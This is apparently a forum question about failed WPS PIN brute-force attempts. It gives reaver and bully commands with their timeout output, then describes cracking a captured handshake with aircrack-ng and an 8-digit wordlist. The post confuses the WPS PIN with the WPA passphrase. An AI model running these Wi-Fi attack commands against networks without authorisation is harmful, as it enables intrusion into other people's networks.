I have been trying out reaver and bully on my network and friends network, multiple different routers, but none of them finds anything.
The command for reaver that I run is:
reaver -i wlan0mon -c 6 -b xx:xx:xx:xx:xx:xx -vv -N -L -S -K 1
The output I get is below, it keeps saying receive timeout. I tried getting closer to the network, even sitting beside it, same problem:
[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Received beacon from xx:xx:xx:xx:xx:xx
[+] Vendor: AtherosC
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxx)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
The two last lines just keeps getting repeated. I tried different parameters too.
The bully command I run looks like this:
bully wlan0mon -b xx:xx:xx:xx:xx:xx -c 6 -v 3 -d
The output:
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[+] Switching interface 'wlan0mon' to channel '6'
[!] Using 'xx:xx:xx:xx:xx:xx' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'xx:xx:xx:xx:xx:xx' on channel '6'
[+] Got beacon for 'xxxx' (xx:xx:xx:xx:xx:xx)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/xxxxxxxxxxxx.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Assn ) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '62121651'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '62121651'
Sometimes bully works and reaver too, (very rarely), but they never get anything, always pin not found. Am I doing something wrong?
I got tired of the errors and tried my own method, what I did was creating a list of all 8 digit combinations, so from 00000000 to 9999999, then I used aircrack to bruteforce the text file, and it actually found the pin for both routers, me and my friends router. I know that all WPS enabled routers has an 8 digit pin, and all 8 digit pins is listed in my text file, my problem however is, that not all WPS routers uses this pin, it can have a PSK that is different from the pin. I bruteforce the .cap file from airodump-ng.
So to sum up, these are my questions:
- Am I doing anything wrong with reaver / bully?
- Is it possible to get the WPS key by bruteforcing with my pin list, even though the router uses another password like "fj93jfo" instead of the 8 digit key, and the router is WPS enabled and not locked?
